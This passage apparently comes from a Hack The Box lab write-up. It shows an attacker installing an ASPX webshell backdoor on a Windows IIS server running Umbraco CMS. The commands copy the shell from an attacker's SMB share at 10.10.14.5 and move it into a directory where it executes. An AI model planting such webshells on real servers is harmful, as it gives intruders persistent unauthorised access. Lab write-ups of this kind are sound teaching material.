Backdoor
The exploit script seemed quite unreliable as there had been multiple trials and errors prior to gaining a foothold. For that very reason, I will be installing a simple backdoor in case of connection loss.
ps c:\inetpub\wwwroot> dir
directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 6:02 PM App_Browsers
d----- 2/20/2020 1:59 AM App_Data
d----- 2/19/2020 10:29 PM App_Plugins
d----- 2/19/2020 3:12 PM aspnet_client
d----- 2/19/2020 11:30 PM bin
d----- 2/19/2020 6:02 PM Config
d----- 2/19/2020 10:29 PM css
d----- 2/20/2020 1:55 AM Media
d----- 2/19/2020 10:29 PM scripts
d----- 2/19/2020 6:02 PM Umbraco
d----- 2/19/2020 6:02 PM Umbraco_Client
d----- 2/19/2020 10:29 PM Views
-a---- 11/1/2018 1:06 PM 152 default.aspx
-a---- 11/1/2018 1:06 PM 89 Global.asax
-a---- 2/20/2020 12:57 AM 28539 Web.config this is the absolute path of the web root directory; c:\inetpub\wwwroot
It seems that the Umbraco CMS installation was made to the default IIS directory
ps c:\inetpub\wwwroot> echo hallo > test.txtMaking a simple test
Green light!
Payload
┌──(kali㉿kali)-[~/archive/htb/labs/remote]
└─$ cp /usr/share/webshells/aspx/cmdasp.aspx .
I am going to put a simple ASPX webshell that comes with Kali at the webroot for ease of access
Installation
ps c:\inetpub\wwwroot> copy \\10.10.14.5\smb\backdoor.aspx
ps c:\inetpub\wwwroot> dir
directory: C:\inetpub\wwwroot
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 2/19/2020 6:02 PM App_Browsers
d----- 2/20/2020 1:59 AM App_Data
d----- 2/19/2020 10:29 PM App_Plugins
d----- 2/19/2020 3:12 PM aspnet_client
d----- 2/19/2020 11:30 PM bin
d----- 2/19/2020 6:02 PM Config
d----- 2/19/2020 10:29 PM css
d----- 2/20/2020 1:55 AM Media
d----- 2/19/2020 10:29 PM scripts
d----- 2/19/2020 6:02 PM Umbraco
d----- 2/19/2020 6:02 PM Umbraco_Client
d----- 2/19/2020 10:29 PM Views
-a---- 2/1/2023 10:20 AM 629 backdoor.aspx
-a---- 11/1/2018 1:06 PM 152 default.aspx
-a---- 11/1/2018 1:06 PM 89 Global.asax
-a---- 2/1/2023 11:11 AM 16 test.txt
-a---- 2/20/2020 12:57 AM 28539 Web.config i placed the aspx webshell as the c:\inetpub\wwwroot directory
But it won’t work likely due to the Web.config file not including external file at the web root, let alone executing it
ps c:\inetpub\wwwroot> move cmdasp.aspx Umbracoi can just move it over to the c:\inetpub\wwwroot\Umbraco directory to hop in to the Umbraco inclusion configured to the Web.config file
and it works fine